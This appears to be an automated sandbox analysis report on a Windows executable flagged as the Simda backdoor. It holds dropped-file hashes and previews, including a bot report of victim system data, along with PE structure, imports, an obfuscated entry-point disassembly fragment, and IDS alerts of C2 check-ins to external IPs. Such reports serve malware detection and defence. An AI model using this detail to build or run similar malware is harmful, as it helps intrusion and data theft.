                                                                                                                                                                                                              Preview:PK........adkY,C..:...........debug_28;Nov;2024_17;56;23.logUT....................0...~.p..J...R.!.mQY.M.V..*'..t..9...w.@.....d.....x.6..&/T(....>X.`..+Q..Y...,]:.........);1.+`{.zg....)!.bQ!...8....W....=.q.............0..j1.i%./x....A..Yv.....\.4..<h...T...*?I.5v....>"...T.E.....se-...0 ...g.pX/x.,..f......A..zU.Zu..i......%.g..r...).....2;k..W....#....CVh..].DO....."..2u.;.....W....`...4;..'S....h.L...9...(....5.ZUH..&...?...z..+..h.5.&.......zy$h..m.....a.s....Z8..?....U.2.GgI...np.W.......{7..s+j......r..s............P".Z4z.S..x..X..@..x)..>%.^..7...._..W....3.O..p.r3]...Q..6Qe0.........A`..=.%./.O...7..Q:...l...PK........adkY...e...6.......scr.bmpUT.................O..Y..x:...3&T.]L`.......n.k.NF...d.I.H.Y....5...Q.....3..*.5.,5...*V. U......^....^.J..9.zxdV0.. .(..{..=..f....f._%.....;.....g.}......j...m...7~..D.....6...d.#....#....n.|.r..W/.o.__....G..K....c...8..m.......{...=.G....{.8m.|....=.]..]z....w...:......G...a....D.?........?......cz..i
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1806
                                                                                                                                                                                                              Entropy (8bit):5.366080581092725
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:uXGVLbMOypxU0zc2i2LuiVGXZVV7RY6f6yZsosrOYXfVRXJsVRXDc3xw80BUYVbE:ulxpBdPSF9Xy/rJ+DAxw8bG0nX7nN
                                                                                                                                                                                                              MD5:E4DFF8657933E99D7F08523015C936DB
                                                                                                                                                                                                              SHA1:8089999714B32FAAA836053FB1B4576054C0FF94
                                                                                                                                                                                                              SHA-256:1BBBBE1B6F162A647AB06924E5682025B75A0E9B3DE8777E0DEF095395A76634
                                                                                                                                                                                                              SHA-512:7789F6FC5CB2302F89EC3124E7D161053F6931A1A3FF5CF7F4CB1C92071E9E3CE4314B2A343D539ABA31D149B0F4656D5B63BB07D80660B287A29F69E6B8D31E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:ExceptionAddress = C:\Windows\System32\KERNELBASE.dll!RaiseException + 0x0062..ExceptionCode = 0x0000071A.Last error: 0x00000000..Context:.Eip = 0x768BCC12 Eax = 0x0757F8E8 Ebx = 0x00000000.Ecx = 0x00000000 Edx = 0x00321000 Ebp = 0x0757F940.Esp = 0x0757F8E8 Esi = 0x0000071A Edi = 0x060DA590.EFlags = 0x00000246..Main module:.main 0x02BB0000-0x00063000..ThreadStart = unknown!0x02bc6970..CallStack:.C:\Windows\System32\RPCRT4.dll!RpcRaiseException + 0x003e.C:\Windows\System32\RPCRT4.dll!RpcErrorGetNextRecord + 0x0461.C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x04ea.C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x0553.C:\Windows\System32\RPCRT4.dll!RpcAsyncCompleteCall + 0x002c.C:\Windows\SYSTEM32\WINSTA.dll!WinStationRegisterConsoleNotification + 0x0422.C:\Windows\SYSTEM32\WINSTA.dll!WinStationQueryCurrentSessionInformation + 0x007a.C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0ba5.C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0b3d.C:\Windows\System32\R
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 8, image size 1310720, cbSize 1311798, bits offset 1078
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1311798
                                                                                                                                                                                                              Entropy (8bit):2.88762694887749
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24576:WZtc8g1t4rA4L+JZt0h+p9Qt03bsMWDjy2quySGp6Uk9OKXN3GGOjkOVoAlOIqQT:WZtc8g1t4rA4L+JZt0h+p9Qt03bsMWDY
                                                                                                                                                                                                              MD5:367B6CEB5F87632B66FDD8871FE13931
                                                                                                                                                                                                              SHA1:F4717B54E3BB777DF5876A19908C27F291C658F2
                                                                                                                                                                                                              SHA-256:F392B4FEDBC4EA0438B4141D0C8887E26A9515DEDBFBAAAC67F989376A2295B4
                                                                                                                                                                                                              SHA-512:8DFD51F9B85ECA250683DA69FCAF3F6D382675092567CBE0F5DE415D00F4AF27077C1207853395A541B2139EC523D377499E5CA9FBEA609A7720F193AFA20D7C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6352
                                                                                                                                                                                                              Entropy (8bit):5.226267598329047
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Z5yRg4ZY8wWx491wA7VCJxZ/Arm5V3UmOLOb+JMO1dOmOTVd0HnhsjC5Pdmevcfg:Z4V5H0w05N1ZhP2sZA/S
                                                                                                                                                                                                              MD5:88FFC9C46F6A5895C4387BFCEE1E1907
                                                                                                                                                                                                              SHA1:68129E4AD839E82300D721988DE7EF1736EC4B44
                                                                                                                                                                                                              SHA-256:414979DB6983ABEF4F69ED4145CF6EDFEEF700ACF2FDCFDB6F994091A94F51E7
                                                                                                                                                                                                              SHA-512:0FDDC42BD11FE66CF44722878772C1C2F935122C5C77C5276F255BA568EC7842BD99BB0BB3F38CF0840E9E761C37B16E9BE8B6C20D985DEBDB6128173918CA54
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:{BotVer: 4.1.2}.{Process: C:\Windows\apppatch\svchost.exe}.{Username: user}.{Processor: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel}.{Language: ENG}.{Screen: 1280x1024@32}.{Date: 28:Nov:2024}.{Local time: 17:56:33}.{GMT: -5:00}.{Uptime: 17d 6h 24m}.{Windows directory: C:\Windows}.{Administrator: true}.IE history:.{http://go.microsoft.com/fwlink/p/?LinkId=255141}.netstat.{Proto.Local address.Remote address.State.TCP.0.0.0.0:135.0.0.0.0:0.LISTEN.TCP.0.0.0.0:445.0.0.0.0:0.LISTEN.TCP.0.0.0.0:5040.0.0.0.0:0.LISTEN.TCP.0.0.0.0:20839.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49664.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49665.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49666.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49667.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49668.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49669.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49670.0.0.0.0:0.LISTEN.TCP.0.0.0.0:64111.0.0.0.0:0.LISTEN.TCP.192.168.2.8:139.0.0.0.0:0.LISTEN.TCP.192.168.2.8:49702.192.168.2.1:445.ESTAB.TCP.192.168.2.8:49703.199.232.214.172:80.TIME_WAIT.TCP.192.168.2.8:49705.13.107
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\arxtPs1STE.exe
                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                              Size (bytes):216576
                                                                                                                                                                                                              Entropy (8bit):7.848217375304929
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:ErMoyX6dxajoPXA1nriwrw1cfCOSJcAb:CysxVY1nZ+b
                                                                                                                                                                                                              MD5:5415F923D36E5D49E48A46CDF5D4B082
                                                                                                                                                                                                              SHA1:93569A1B675626D3A54E9D77A4A022C255500964
                                                                                                                                                                                                              SHA-256:31BECB75A2546A0B7B0866F163424B95BF42DCB2393E0A3C31765D32C92827A4
                                                                                                                                                                                                              SHA-512:966D34B42EFCED4671FD6919DA08E3CB296E610A69A3376B82B9ABAEE8E449D823BAF4BD81B4BA0A07721865AF4C986D77133349EBB0CAD476F9988C92E105F8
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.8?.................,......*.................@.......................... .......u...............................................`..x...........................@&...............................................................................text....+.......,.................. ..`.D.......S...@.......0..............@....SC.....g............4..............@....Wp...... ...........<..............@..@.aS..................>..............@....vtzr....w...........B..............@..@.fvH....-.... .......R..............@..@.data....@.......B...Z..............@....Lx......@..........................@....sOZF...s(...P......................@....h..................................@....rsrc...x....`......................@..@.reloc...............J..............@..B........................................................................................................
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\arxtPs1STE.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Entropy (8bit):7.848213512443685
                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                              File name:arxtPs1STE.exe
                                                                                                                                                                                                              File size:216'576 bytes
                                                                                                                                                                                                              MD5:6154c4f64b8f9185a4644cdea5c69408
                                                                                                                                                                                                              SHA1:ce4b4763d9b269ea600e8fc594781882ca6c8486
                                                                                                                                                                                                              SHA256:a484e354b3c1d5e13033067711a085fae7e74b53c6b003c10306ed58fc9a0288
                                                                                                                                                                                                              SHA512:7bcb59b256aed8e625a86869dae4f8a828398adcd8da7ba57ee05ecdb73069d57121b476a6bfad1490fa409bf5d40852f5a2e5cdb1258160f5b8e4f8f349993e
                                                                                                                                                                                                              SSDEEP:6144:BrMoyX6dxajoPXA1nriwrw1cfCOSJcAb:ZysxVY1nZ+b
                                                                                                                                                                                                              TLSH:9D240293F38A29E7C2200D3F12F7230711B74A615375C59BE641A66D3AD65C8BCE2A37
                                                                                                                                                                                                              Icon Hash:000a35b5b5b5b555
                                                                                                                                                                                                              Entrypoint:0x401b81
                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                              DLL Characteristics:
                                                                                                                                                                                                              Time Stamp:0x3F38BB49 [Tue Aug 12 10:02:49 2003 UTC]
                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                              Import Hash:1c6c3b0bd56b7f130f1f283a88a358b9
                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                              mov dword ptr [0042C4BBh], 00000000h
                                                                                                                                                                                                              mov eax, dword ptr [0042C4BBh]
                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                              push eax
                                                                                                                                                                                                              mov edx, 00000000h
                                                                                                                                                                                                              push edx
                                                                                                                                                                                                              call dword ptr [0041A0E8h]
                                                                                                                                                                                                              mov dword ptr [0042B3DBh], eax
                                                                                                                                                                                                              mov dword ptr [0042BE8Ah], 00000000h
                                                                                                                                                                                                              mov eax, dword ptr [0042BE8Ah]
                                                                                                                                                                                                              push 00000CD8h
                                                                                                                                                                                                              pop ecx
                                                                                                                                                                                                              sub dword ptr [0042B515h], ecx
                                                                                                                                                                                                              sub ecx, 00000B04h
                                                                                                                                                                                                              add ecx, 00000FC4h
                                                                                                                                                                                                              jc 00007F11E0E028E8h
                                                                                                                                                                                                              sub dword ptr [0042C68Fh], ecx
                                                                                                                                                                                                              sub dword ptr [0042BB7Fh], ecx
                                                                                                                                                                                                              shl ecx, 1
                                                                                                                                                                                                              ror ecx, 1
                                                                                                                                                                                                              inc ecx
                                                                                                                                                                                                              shr ecx, 03h
                                                                                                                                                                                                              add ecx, 0000020Ah
                                                                                                                                                                                                              jbe 00007F11E0E028E4h
                                                                                                                                                                                                              ror ecx, 1
                                                                                                                                                                                                              sub ecx, 0000063Ch
                                                                                                                                                                                                              add dword ptr [0042BBF3h], ecx
                                                                                                                                                                                                              call 00007F11E0E039A1h
                                                                                                                                                                                                              mov dword ptr [0042B16Ch], eax
                                                                                                                                                                                                              mov esi, 00000070h
                                                                                                                                                                                                              push esi
                                                                                                                                                                                                              mov ebx, 003B993Ch
                                                                                                                                                                                                              add ebx, 0004794Ch
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              push 00000001h
                                                                                                                                                                                                              pop ebx
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              mov ebx, 0088689Fh
                                                                                                                                                                                                              mov ecx, ebx
                                                                                                                                                                                                              sub ecx, 0046C7EFh
                                                                                                                                                                                                              call dword ptr [ecx]
                                                                                                                                                                                                              mov eax, 000B3EA0h
                                                                                                                                                                                                              mov ebp, eax
                                                                                                                                                                                                              mov ebx, 003784B2h
                                                                                                                                                                                                              add ebp, ebx
                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                              mov dword ptr [0042BD80h], 00000000h
                                                                                                                                                                                                              mov ebx, dword ptr [0042BD80h]
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1a21c | 0xc8 | .vtzr |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0x2a078 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x91000 | 0x3ac | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x22640 | 0x1c | .fvH |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x2b13 | 0x2c00 | a4d3b0ce94ad84ed9b2c4a969cc56c70 | False | 0.7213245738636364 | data | 6.3708778153510535 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .D | 0x4000 | 0x5395 | 0x400 | 0a4832bacfca532f98f82bc1cc110244 | False | 0.69921875 | data | 5.273643553772029 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .SC | 0xa000 | 0x1b67 | 0x800 | bb8ff8817aa8b7520a20564fd256b92f | False | 0.7783203125 | data | 6.022115319944559 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .Wp | 0xc000 | 0x2018 | 0x200 | 9611c8690e8bf17b251ef8b541ed1e18 | False | 0.123046875 | data | 0.6947806982136152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .aS | 0xf000 | 0xa414 | 0x400 | d5ffc696fc4b630af8e12dfa1574f79c | False | 0.765625 | data | 6.148168693021462 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .vtzr | 0x1a000 | 0x77dc | 0x1000 | 4f89745b1d45e480b7f984a37b2ca7cb | False | 0.421630859375 | data | 4.955037110529063 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .fvH | 0x22000 | 0x812d | 0x800 | c13d406df81dfb9974deaa5e7f3abd5c | False | 0.66162109375 | data | 5.533722089361082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x2b000 | 0x40e1 | 0x4200 | 1198ccdd255c02df07ec9c1fcfac9f40 | False | 0.8023200757575758 | data | 6.722929764502196 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .Lx | 0x30000 | 0x40f8 | 0x200 | 46a7c2a4a48f130efa5331a91bf9e031 | False | 0.8359375 | data | 6.270861660546221 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .sOZF | 0x35000 | 0x2873 | 0x200 | f4b90d55380f914fc23bd3ebea3c4353 | False | 0.14453125 | data | 0.9511370466044033 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .h | 0x38000 | 0x2dd8e | 0x800 | d7507f29fab95163821d691fdda39111 | False | 0.59033203125 | data | 4.8672358493330465 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x66000 | 0x2a078 | 0x2a200 | 7ab61db470df553ddeddd538afefbc71 | False | 0.9833433790801187 | data | 7.982188426455354 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x91000 | 0x3ac | 0x400 | d66b97b3d918ce38ba35c65e93106bb1 | False | 0.8583984375 | data | 6.404465099324306 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x66178 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4160412757973734 |
| RT_DIALOG | 0x67220 | 0x4c | data | English | United States | 0.9210526315789473 |
| RT_RCDATA | 0x6726c | 0x28b94 | data | English | United States | 1.0003656986643006 |
| RT_GROUP_ICON | 0x8fe00 | 0x14 | data | English | United States | 1.1 |
| RT_VERSION | 0x8fe14 | 0x264 | data | English | United States | 0.5179738562091504 |

| DLL | Import |
|---|---|
| KERNEL32.DLL | CreateDirectoryW, GetStartupInfoW, OpenWaitableTimerW, BeginUpdateResourceA, OpenEventA, DeleteAtom, CreateMailslotW, ReplaceFileA, CompareFileTime, ReadFile, GetCalendarInfoW, SetLocaleInfoA, GetLogicalDriveStringsA, GetLastError, SetPriorityClass, GetUserDefaultLangID, SearchPathA, GetTimeFormatW, GetModuleHandleA, lstrcpy, CreateFileA, QueryPerformanceCounter, EnumDateFormatsA, ReadDirectoryChangesW, GetMailslotInfo, GetProcAddress, GlobalFindAtomW, RaiseException, EnumTimeFormatsA, GetComputerNameA, FreeLibrary, GetFullPathNameW, OpenEventW, SetComputerNameW, GetLongPathNameW, GetNamedPipeInfo, GetHandleInformation, GetExpandedNameA, SetEvent |
| user32.dll | GetClassInfoA, LoadMenuIndirectA, CopyIcon, WinHelpA, EnumDesktopsA, SetActiveWindow, CreateDesktopA, GetSystemMetrics, CreatePopupMenu, BringWindowToTop, PeekMessageA, ClientToScreen, SetWindowRgn, GetDlgItemTextA, GetMenuInfo, GetClassLongA, IsMenu, FrameRect, LoadIconW, InsertMenuItemA, SetWindowLongW, GetFocus, GetCaretPos, DefWindowProcA, LoadBitmapW, EnumWindows, GetMenuStringW, MessageBoxIndirectA, EmptyClipboard, GetMenuItemID, GetWindowLongW, MonitorFromPoint, DestroyWindow, SetDlgItemTextW, CreateWindowExW, CharNextA, MessageBoxIndirectW, CreateAcceleratorTableA, GetDlgItemInt, SetCursor |
| GDI32.DLL | CreateEnhMetaFileW, GetMetaFileBitsEx, GetMapMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, CreateBitmap, GetCharacterPlacementW, FrameRgn, SetSystemPaletteUse, GetCharABCWidthsFloatW, SelectObject, CreateDCA, CreateMetaFileW, SetBkColor, CreateFontW, ExtTextOutW, GetTextExtentExPointA, CreateScalableFontResourceW, EndDoc, CreateDIBitmap, GetEnhMetaFileDescriptionW |
| ADVAPI32.DLL | RegOpenKeyExA, RegDeleteKeyA, RegOpenKeyExW, RegOpenKeyW, RegDeleteValueA, RegDeleteKeyW, RegQueryValueA |
| shell32.dll | Shell_NotifyIconA, StrRChrW, StrRChrIA |
| oleaut32.dll | VarI2FromBool, VarR8Round, OleCreatePictureIndirect, VarUI4FromStr, SafeArrayAllocData, LHashValOfNameSys, VarDecAbs |
| OPENGL32.DLL | glFogiv |
| setupapi.dll | pSetupDoesUserHavePrivilege |
| WINMM.DLL | mmioClose, waveOutGetNumDevs, midiInGetDevCapsA, mciGetDeviceIDW, waveOutGetDevCapsA, mixerGetLineInfoA, auxGetDevCapsW |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                                                                                                                              2024-11-11T18:33:34.542556+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850107162.255.119.10280TCP
                                                                                                                                                                                                              2024-11-11T18:33:35.316307+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850110178.162.217.10780TCP
                                                                                                                                                                                                              2024-11-11T18:33:35.687121+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85011275.2.71.199443TCP
                                                                                                                                                                                                              2024-11-11T18:33:35.785679+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849722154.212.231.8280TCP
                                                                                                                                                                                                              2024-11-11T18:33:36.066459+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85011391.195.240.1980TCP
                                                                                                                                                                                                              2024-11-11T18:33:36.398416+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850111188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:33:36.805439+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849712188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:33:38.017296+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850114188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:33:38.499010+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849728103.150.10.4880TCP
                                                                                                                                                                                                              2024-11-11T18:33:38.526649+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849725188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:33:39.383050+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849728103.150.10.4880TCP
                                                                                                                                                                                                              2024-11-11T18:33:40.905596+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850115188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:33:41.269729+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849725188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:33:43.234703+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850116188.114.96.3443TCP
                                                                                                                                                                                                              2024-11-11T18:33:44.359831+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850117103.224.212.21080TCP
                                                                                                                                                                                                              2024-11-11T18:33:44.512999+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849736154.85.183.5080TCP
                                                                                                                                                                                                              2024-11-11T18:33:44.760611+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.850118103.224.182.25280TCP
                                                                                                                                                                                                              2024-11-11T18:33:47.260110+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849736154.85.183.5080TCP
                                                                                                                                                                                                              2024-11-11T18:33:51.115283+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86066972.52.179.17480TCP
                                                                                                                                                                                                              2024-11-11T18:33:52.527855+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86067372.52.179.17480TCP
                                                                                                                                                                                                              2024-11-11T18:33:57.677062+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.855157UDP
                                                                                                                                                                                                              2024-11-11T18:34:03.909558+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.860687188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:34:03.910005+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86069075.2.71.19980TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.004679+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.860696188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.020892+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.860700208.100.26.24580TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.021032+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86070244.221.84.10580TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.021086+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.860698188.114.96.380TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.021151+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86069544.221.84.10580TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.021169+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86070123.253.46.6480TCP
                                                                                                                                                                                                              2024-11-11T18:34:04.021867+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.86069475.2.71.19980TCP
                                                                                                                                                                                                              2024-11-11T18:34:05.064133+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.860697TCP
                                                                                                                                                                                                              2024-11-11T18:34:05.780817+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.8607103.94.10.3480TCP
                                                                                                                                                                                                              2024-11-11T18:34:05.780873+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.860709199.191.50.8380TCP
                                                                                                                                                                                                              2024-11-11T18:35:02.384951+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.858292UDP
                                                                                                                                                                                                              2024-11-11T18:35:02.985591+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.854073162.255.119.10280TCP
                                                                                                                                                                                                              2024-11-11T18:35:02.985591+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.857727199.59.243.22780TCP
                                                                                                                                                                                                              2024-11-11T18:35:02.985971+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85773075.2.71.19980TCP
                                                                                                                                                                                                              2024-11-11T18:35:03.002515+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.85772844.221.84.10580TCP
                                                                                                                                                                                                              2024-11-11T18:35:03.031389+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.8577313.94.10.3480TCP
